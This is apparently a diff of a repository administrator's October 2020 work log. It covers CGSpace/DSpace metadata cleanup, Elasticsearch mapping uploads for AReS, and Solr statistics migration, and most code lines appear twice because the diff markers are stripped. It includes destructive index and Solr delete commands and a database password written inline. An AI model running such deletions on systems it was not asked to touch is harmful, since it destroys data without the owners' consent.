dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;dc.subject&#34;, count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=57 GROUP BY &#34;dc.subject&#34; ORDER BY count DESC LIMIT 1500) TO /tmp/2020-10-15-top-1500-agrovoc-subject.csv WITH CSV HEADER;
COPY 1500
</code></pre><ul>
<li>Use my <code>agrovoc-lookup.py</code> script to validate subject terms against the AGROVOC REST API, extract matches with <code>csvgrep</code>, and then update and format the controlled vocabulary:</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c 1 /tmp/2020-10-15-top-1500-agrovoc-subject.csv | tail -n 1500 &gt; /tmp/subjects.txt
$ ./agrovoc-lookup.py -i /tmp/subjects.txt -o /tmp/subjects.csv -d
$ csvgrep -c 4 -m 0 -i /tmp/subjects.csv | csvcut -c 1 | sed '1d' &gt; dspace/config/controlled-vocabularies/dc-subject.xml
$ csvgrep -c 4 -m 0 -i /tmp/subjects.csv | csvcut -c 1 | sed &#39;1d&#39; &gt; dspace/config/controlled-vocabularies/dc-subject.xml
# apply formatting in XML file
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.xml
</code></pre><ul>
@ -614,7 +614,7 @@ sys 2m22.713s
<li>They are using the user agent &ldquo;CCAFS Website Publications importer BOT&rdquo; so they are getting rate limited by nginx</li>
<li>Ideally they would use the REST <code>find-by-metadata-field</code> endpoint, but it is <em>really</em> slow for large result sets (like twenty minutes!):</li>
</ul>
<pre tabindex="0"><code>$ curl -f -H &quot;CCAFS Website Publications importer BOT&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field?limit=100&quot; -d '{&quot;key&quot;:&quot;cg.contributor.crp&quot;, &quot;value&quot;:&quot;Climate Change, Agriculture and Food Security&quot;,&quot;language&quot;: &quot;en_US&quot;}'
<pre tabindex="0"><code>$ curl -f -H &#34;CCAFS Website Publications importer BOT&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field?limit=100&#34; -d &#39;{&#34;key&#34;:&#34;cg.contributor.crp&#34;, &#34;value&#34;:&#34;Climate Change, Agriculture and Food Security&#34;,&#34;language&#34;: &#34;en_US&#34;}&#39;
</code></pre><ul>
<li>For now I will whitelist their user agent so that they can continue scraping /browse</li>
<li>I figured out that the mappings for AReS are stored in Elasticsearch
@ -624,23 +624,23 @@ sys 2m22.713s
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -XPOST &quot;localhost:9200/openrxv-values/_delete_by_query&quot; -H 'Content-Type: application/json' -d'
<pre tabindex="0"><code>$ curl -XPOST &#34;localhost:9200/openrxv-values/_delete_by_query&#34; -H &#39;Content-Type: application/json&#39; -d&#39;
{
&quot;query&quot;: {
&quot;match&quot;: {
&quot;_id&quot;: &quot;64j_THMBiwiQ-PKfCSlI&quot;
&#34;query&#34;: {
&#34;match&#34;: {
&#34;_id&#34;: &#34;64j_THMBiwiQ-PKfCSlI&#34;
}
}
}
</code></pre><ul>
<li>I added a new find/replace:</li>
</ul>
<pre tabindex="0"><code>$ curl -XPOST &quot;localhost:9200/openrxv-values/_doc?pretty&quot; -H 'Content-Type: application/json' -d'
<pre tabindex="0"><code>$ curl -XPOST &#34;localhost:9200/openrxv-values/_doc?pretty&#34; -H &#39;Content-Type: application/json&#39; -d&#39;
{
&quot;find&quot;: &quot;ALAN1&quot;,
&quot;replace&quot;: &quot;ALAN2&quot;,
&#34;find&#34;: &#34;ALAN1&#34;,
&#34;replace&#34;: &#34;ALAN2&#34;,
}
'
&#39;
</code></pre><ul>
<li>I see it in Kibana, and I can search it in Elasticsearch, but I don&rsquo;t see it in OpenRXV&rsquo;s mapping values dashboard</li>
<li>Now I deleted everything in the <code>openrxv-values</code> index:</li>
@ -649,12 +649,12 @@ sys 2m22.713s
</code></pre><ul>
<li>Then I tried posting it again:</li>
</ul>
<pre tabindex="0"><code>$ curl -XPOST &quot;localhost:9200/openrxv-values/_doc?pretty&quot; -H 'Content-Type: application/json' -d'
<pre tabindex="0"><code>$ curl -XPOST &#34;localhost:9200/openrxv-values/_doc?pretty&#34; -H &#39;Content-Type: application/json&#39; -d&#39;
{
&quot;find&quot;: &quot;ALAN1&quot;,
&quot;replace&quot;: &quot;ALAN2&quot;,
&#34;find&#34;: &#34;ALAN1&#34;,
&#34;replace&#34;: &#34;ALAN2&#34;,
}
'
&#39;
</code></pre><ul>
<li>But I still don&rsquo;t see it in AReS</li>
<li>Interesting! I added a find/replace manually in AReS and now I see the one I POSTed&hellip;</li>
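<li>As a quick sanity check, the new document can be confirmed directly in Elasticsearch with a URI search (a sketch, reusing the test values from above):</li>
</ul>
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:9200/openrxv-values/_search?q=find:ALAN1&amp;pretty&#39;
</code></pre><ul>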
@ -683,63 +683,63 @@ sys 2m22.713s
<li>Last night I learned how to POST mappings to Elasticsearch for AReS:</li>
</ul>
<pre tabindex="0"><code>$ curl -XDELETE http://localhost:9200/openrxv-values
$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H &quot;Content-Type: application/json&quot; --data-binary @./mapping.json
$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H &#34;Content-Type: application/json&#34; --data-binary @./mapping.json
</code></pre><ul>
<li>The JSON file looks like this, with one instruction on each line:</li>
</ul>
<pre tabindex="0"><code>{&quot;index&quot;:{}}
{ &quot;find&quot;: &quot;CRP on Dryland Systems - DS&quot;, &quot;replace&quot;: &quot;Dryland Systems&quot; }
{&quot;index&quot;:{}}
{ &quot;find&quot;: &quot;FISH&quot;, &quot;replace&quot;: &quot;Fish&quot; }
<pre tabindex="0"><code>{&#34;index&#34;:{}}
{ &#34;find&#34;: &#34;CRP on Dryland Systems - DS&#34;, &#34;replace&#34;: &#34;Dryland Systems&#34; }
{&#34;index&#34;:{}}
{ &#34;find&#34;: &#34;FISH&#34;, &#34;replace&#34;: &#34;Fish&#34; }
</code></pre><ul>
<li>Adjust the report templates on AReS based on some of Peter&rsquo;s feedback</li>
<li>I wrote a quick Python script to filter and convert the old AReS mappings to <a href="https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-bulk.html">Elasticsearch&rsquo;s Bulk API</a> format:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#75715e">#!/usr/bin/env python3</span>
<span style="color:#f92672">import</span> json
<span style="color:#f92672">import</span> re
f <span style="color:#f92672">=</span> open(<span style="color:#e6db74">&#39;/tmp/mapping.json&#39;</span>, <span style="color:#e6db74">&#39;r&#39;</span>)
data <span style="color:#f92672">=</span> json<span style="color:#f92672">.</span>load(f)
<span style="color:#75715e"># Iterate over old mapping file, which is in format &#34;find&#34;: &#34;replace&#34;, ie:</span>
<span style="color:#75715e">#</span>
<span style="color:#75715e"># &#34;alan&#34;: &#34;ALAN&#34;</span>
<span style="color:#75715e">#</span>
<span style="color:#75715e"># And convert to proper dictionaries for import into Elasticsearch&#39;s Bulk API:</span>
<span style="color:#75715e">#</span>
<span style="color:#75715e"># { &#34;find&#34;: &#34;alan&#34;, &#34;replace&#34;: &#34;ALAN&#34; }</span>
<span style="color:#75715e">#</span>
<span style="color:#66d9ef">for</span> find, replace <span style="color:#f92672">in</span> data<span style="color:#f92672">.</span>items():
<span style="color:#75715e"># Skip all upper and all lower case strings because they are indicative of</span>
<span style="color:#75715e"># some AGROVOC or other mappings we no longer want to do</span>
<span style="color:#66d9ef">if</span> find<span style="color:#f92672">.</span>isupper() <span style="color:#f92672">or</span> find<span style="color:#f92672">.</span>islower() <span style="color:#f92672">or</span> replace<span style="color:#f92672">.</span>isupper() <span style="color:#f92672">or</span> replace<span style="color:#f92672">.</span>islower():
<span style="color:#66d9ef">continue</span>
<span style="color:#75715e"># Skip replacements with acronyms like:</span>
<span style="color:#75715e">#</span>
<span style="color:#75715e"># International Livestock Research Institute - ILRI</span>
<span style="color:#75715e">#</span>
acronym_pattern <span style="color:#f92672">=</span> re<span style="color:#f92672">.</span>compile(<span style="color:#e6db74">r</span><span style="color:#e6db74">&#34;[A-Z]+$&#34;</span>)
acronym_pattern_match <span style="color:#f92672">=</span> acronym_pattern<span style="color:#f92672">.</span>search(replace)
<span style="color:#66d9ef">if</span> acronym_pattern_match <span style="color:#f92672">is</span> <span style="color:#f92672">not</span> <span style="color:#66d9ef">None</span>:
<span style="color:#66d9ef">continue</span>
mapping <span style="color:#f92672">=</span> { <span style="color:#e6db74">&#34;find&#34;</span>: find, <span style="color:#e6db74">&#34;replace&#34;</span>: replace }
<span style="color:#75715e"># Print command for Elasticsearch</span>
print(<span style="color:#e6db74">&#39;{&#34;index&#34;:</span><span style="color:#e6db74">{}</span><span style="color:#e6db74">}&#39;</span>)
print(json<span style="color:#f92672">.</span>dumps(mapping))
f<span style="color:#f92672">.</span>close()
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env python3</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> json
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> re
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>f <span style="color:#f92672">=</span> open(<span style="color:#e6db74">&#39;/tmp/mapping.json&#39;</span>, <span style="color:#e6db74">&#39;r&#39;</span>)
</span></span><span style="display:flex;"><span>data <span style="color:#f92672">=</span> json<span style="color:#f92672">.</span>load(f)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Iterate over old mapping file, which is in format &#34;find&#34;: &#34;replace&#34;, ie:</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># &#34;alan&#34;: &#34;ALAN&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># And convert to proper dictionaries for import into Elasticsearch&#39;s Bulk API:</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># { &#34;find&#34;: &#34;alan&#34;, &#34;replace&#34;: &#34;ALAN&#34; }</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> find, replace <span style="color:#f92672">in</span> data<span style="color:#f92672">.</span>items():
</span></span><span style="display:flex;"><span> <span style="color:#75715e"># Skip all upper and all lower case strings because they are indicative of</span>
</span></span><span style="display:flex;"><span> <span style="color:#75715e"># some AGROVOC or other mappings we no longer want to do</span>
</span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> find<span style="color:#f92672">.</span>isupper() <span style="color:#f92672">or</span> find<span style="color:#f92672">.</span>islower() <span style="color:#f92672">or</span> replace<span style="color:#f92672">.</span>isupper() <span style="color:#f92672">or</span> replace<span style="color:#f92672">.</span>islower():
</span></span><span style="display:flex;"><span> <span style="color:#66d9ef">continue</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> <span style="color:#75715e"># Skip replacements with acronyms like:</span>
</span></span><span style="display:flex;"><span> <span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span> <span style="color:#75715e"># International Livestock Research Institute - ILRI</span>
</span></span><span style="display:flex;"><span> <span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span> acronym_pattern <span style="color:#f92672">=</span> re<span style="color:#f92672">.</span>compile(<span style="color:#e6db74">r</span><span style="color:#e6db74">&#34;[A-Z]+$&#34;</span>)
</span></span><span style="display:flex;"><span> acronym_pattern_match <span style="color:#f92672">=</span> acronym_pattern<span style="color:#f92672">.</span>search(replace)
</span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> acronym_pattern_match <span style="color:#f92672">is</span> <span style="color:#f92672">not</span> <span style="color:#66d9ef">None</span>:
</span></span><span style="display:flex;"><span> <span style="color:#66d9ef">continue</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> mapping <span style="color:#f92672">=</span> { <span style="color:#e6db74">&#34;find&#34;</span>: find, <span style="color:#e6db74">&#34;replace&#34;</span>: replace }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> <span style="color:#75715e"># Print command for Elasticsearch</span>
</span></span><span style="display:flex;"><span> print(<span style="color:#e6db74">&#39;{&#34;index&#34;:</span><span style="color:#e6db74">{}</span><span style="color:#e6db74">}&#39;</span>)
</span></span><span style="display:flex;"><span> print(json<span style="color:#f92672">.</span>dumps(mapping))
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>f<span style="color:#f92672">.</span>close()
</span></span></code></pre></div><ul>
<li>It filters all upper and lower case strings as well as any replacements that end in an acronym like &ldquo;- ILRI&rdquo;, reducing the number of mappings from around 4,000 to about 900</li>
<li>I deleted the existing <code>openrxv-values</code> Elasticsearch core and then POSTed it:</li>
</ul>
<pre tabindex="0"><code>$ ./convert-mapping.py &gt; /tmp/elastic-mappings.txt
$ curl -XDELETE http://localhost:9200/openrxv-values
$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H &quot;Content-Type: application/json&quot; --data-binary @/tmp/elastic-mappings.txt
$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H &#34;Content-Type: application/json&#34; --data-binary @/tmp/elastic-mappings.txt
</code></pre><ul>
<li>Then in AReS I didn&rsquo;t see the mappings in the dashboard until I added a new one manually, after which they all appeared
<ul>
@ -762,12 +762,12 @@ $ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H &quot;Content-T
</li>
<li>I ran the <code>dspace cleanup -v</code> process on CGSpace and got an error:</li>
</ul>
<pre tabindex="0"><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(192921) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(192921) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre tabindex="0"><code>$ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (192921);'
<pre tabindex="0"><code>$ psql -d dspace -U dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (192921);&#39;
UPDATE 1
</code></pre><ul>
<li>After looking at the CGSpace Solr stats for 2020-10 I found some hits to purge:</li>
@ -794,8 +794,8 @@ Total number of bot hits purged: 8174
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&quot;RTB website BOT&quot;
$ curl -s 'http://localhost:8083/solr/statistics/update?softCommit=true'
<pre tabindex="0"><code>$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&#34;RTB website BOT&#34;
$ curl -s &#39;http://localhost:8083/solr/statistics/update?softCommit=true&#39;
</code></pre><ul>
<li>And I saw three hits in Solr with <code>isBot: true</code>!!!
<ul>
@ -817,9 +817,9 @@ $ curl -s 'http://localhost:8083/solr/statistics/update?softCommit=true'
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx2048m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx2048m&#34;
$ dspace metadata-export -f /tmp/cgspace.csv
$ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US],cg.subject.alliancebiovciat[],cg.subject.alliancebiovciat[en_US],cg.subject.bioversity[en_US],cg.subject.ccafs[],cg.subject.ccafs[en_US],cg.subject.ciat[],cg.subject.ciat[en_US],cg.subject.cip[],cg.subject.cip[en_US],cg.subject.cpwf[en_US],cg.subject.iita,cg.subject.iita[en_US],cg.subject.iwmi[en_US]' /tmp/cgspace.csv &gt; /tmp/cgspace-subjects.csv
$ csvcut -c &#39;id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US],cg.subject.alliancebiovciat[],cg.subject.alliancebiovciat[en_US],cg.subject.bioversity[en_US],cg.subject.ccafs[],cg.subject.ccafs[en_US],cg.subject.ciat[],cg.subject.ciat[en_US],cg.subject.cip[],cg.subject.cip[en_US],cg.subject.cpwf[en_US],cg.subject.iita,cg.subject.iita[en_US],cg.subject.iwmi[en_US]&#39; /tmp/cgspace.csv &gt; /tmp/cgspace-subjects.csv
</code></pre><ul>
<li>Then I went through all center subjects looking for &ldquo;WOMEN&rdquo; or &ldquo;GENDER&rdquo; and checking if they were missing the associated AGROVOC subject
<ul>
@ -848,7 +848,7 @@ $ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:9200/openrxv-items-final/_search?_source_includes=affiliation&amp;size=10000&amp;q=*:*' &gt; /tmp/affiliations.json
<pre tabindex="0"><code>$ http &#39;http://localhost:9200/openrxv-items-final/_search?_source_includes=affiliation&amp;size=10000&amp;q=*:*&#39; &gt; /tmp/affiliations.json
</code></pre><ul>
<li>Then I decided to try a different approach and I adjusted my <code>convert-mapping.py</code> script to re-consider some replacement patterns with acronyms from the original AReS <code>mapping.json</code> file to hopefully address some MEL to CGSpace mappings
<ul>
@ -897,8 +897,8 @@ $ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri
$ git checkout origin/6_x-dev-atmire-modules
$ chrt -b 0 mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false clean package
$ sudo su - postgres
$ psql dspacetest -c 'CREATE EXTENSION pgcrypto;'
$ psql dspacetest -c &quot;DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');&quot;
$ psql dspacetest -c &#39;CREATE EXTENSION pgcrypto;&#39;
$ psql dspacetest -c &#34;DELETE FROM schema_version WHERE version IN (&#39;5.8.2015.12.03.3&#39;);&#34;
$ exit
$ sudo systemctl stop tomcat7
$ cd dspace/target/dspace-installer
@ -911,7 +911,7 @@ $ sudo systemctl start tomcat7
</code></pre><ul>
<li>Then I started processing the Solr stats one core and 1 million records at a time:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
@ -920,8 +920,8 @@ $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
</code></pre><ul>
<li>After the fifth or so run I got this error:</li>
</ul>
<pre tabindex="0"><code>Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
<pre tabindex="0"><code>Exception: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
@ -945,7 +945,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8083/solr/statistics/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&quot;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8083/solr/statistics/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&#34;
</code></pre><ul>
<li>Then I restarted the <code>solr-upgrade-statistics-6x</code> process, which apparently had no records left to process</li>
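<li>To verify that, the remaining un-migrated documents can be counted with a Solr query that mirrors the delete query above (a sketch; <code>rows=0</code> returns just the <code>numFound</code> count):</li>
</ul>
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8083/solr/statistics/select?q=id:/.+-unmigrated/&amp;rows=0&amp;wt=json&#39;
</code></pre><ul>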
<li>I started processing the statistics-2019 core&hellip;
@ -967,8 +967,8 @@ java.lang.OutOfMemoryError: Java heap space
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8083/solr/statistics-2018/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;id:/.+-unmigrated/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8083/solr/statistics-2018/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;id:/.+-unmigrated/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><ul>
<li>I restarted the process and it crashed again a few minutes later
<ul>
<li>I increased the memory to 4096m and tried again</li>
@ -976,7 +976,7 @@ java.lang.OutOfMemoryError: Java heap space
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8083/solr/statistics-2018/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&quot;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8083/solr/statistics-2018/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&#34;
</code></pre><ul>
<li>Then I started processing the statistics-2017 core&hellip;
<ul>
@ -984,7 +984,7 @@ java.lang.OutOfMemoryError: Java heap space
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8083/solr/statistics-2017/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&quot;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8083/solr/statistics-2017/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&#34;
</code></pre><ul>
<li>Also I purged 2.7 million unmigrated records from the statistics-2019 core</li>
<li>I filed an issue with Atmire about the duplicate values in the <code>owningComm</code> and <code>containerCommunity</code> fields in Solr: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=839">https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=839</a></li>
@ -1011,7 +1011,7 @@ java.lang.OutOfMemoryError: Java heap space
</li>
</ul>
<pre tabindex="0"><code>$ dspace metadata-export -f /tmp/cgspace.csv
$ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US]' /tmp/cgspace.csv &gt; /tmp/cgspace-subjects.csv
$ csvcut -c &#39;id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US]&#39; /tmp/cgspace.csv &gt; /tmp/cgspace-subjects.csv
</code></pre><ul>
<li>I sanity checked the CSV in <code>csv-metadata-quality</code> after exporting from OpenRefine, then applied the changes to 453 items on CGSpace</li>
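<li>For reference, the sanity check is just a matter of running the exported CSV through the tool (a sketch; the file name is illustrative):</li>
</ul>
<pre tabindex="0"><code>$ csv-metadata-quality -i /tmp/cgspace-subjects.csv -o /tmp/cgspace-subjects-cleaned.csv
</code></pre><ul>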
<li>Skype with Peter and Abenet about CGSpace Explorer (AReS)
@ -1043,7 +1043,7 @@ $ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri
<pre tabindex="0"><code>$ ./create-mappings.py &gt; /tmp/elasticsearch-mappings.txt
$ ./convert-mapping.py &gt;&gt; /tmp/elasticsearch-mappings.txt
$ curl -XDELETE http://localhost:9200/openrxv-values
$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H &quot;Content-Type: application/json&quot; --data-binary @/tmp/elasticsearch-mappings.txt
$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H &#34;Content-Type: application/json&#34; --data-binary @/tmp/elasticsearch-mappings.txt
</code></pre><ul>
<li>After that I had to manually create and delete a fake mapping in the AReS UI so that the mappings would show up</li>
<li>I fixed a few strings in the OpenRXV admin dashboard and then re-built the frontend container:</li>
@ -1088,16 +1088,16 @@ South Asia,Southern Asia
Africa South Of Sahara,Sub-Saharan Africa
North Africa,Northern Africa
West Asia,Western Asia
$ ./fix-metadata-values.py -i 2020-10-28-update-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227 -d
$ ./fix-metadata-values.py -i 2020-10-28-update-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -t &#39;correct&#39; -m 227 -d
</code></pre><ul>
<li>Then I started a full Discovery re-indexing:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>real 92m14.294s
user 7m59.840s
sys 2m22.327s
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real 92m14.294s
</span></span><span style="display:flex;"><span>user 7m59.840s
</span></span><span style="display:flex;"><span>sys 2m22.327s
</span></span></code></pre></div><ul>
<li>I realized I had been using an incorrect Solr query to purge unmigrated items after processing with <code>solr-upgrade-statistics-6x</code>&hellip;
<ul>
<li>Instead of this: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
@ -1115,17 +1115,17 @@ sys 2m22.327s
</li>
<li>Send Peter a list of affiliations, authors, journals, publishers, investors, and series for correction:</li>
</ul>
<pre tabindex="0"><code>dspace=&gt; \COPY (SELECT DISTINCT text_value as &quot;cg.contributor.affiliation&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-affiliations.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-affiliations.csv WITH CSV HEADER;
COPY 6357
dspace=&gt; \COPY (SELECT DISTINCT text_value as &quot;dc.description.sponsorship&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-sponsors.csv WITH CSV HEADER;
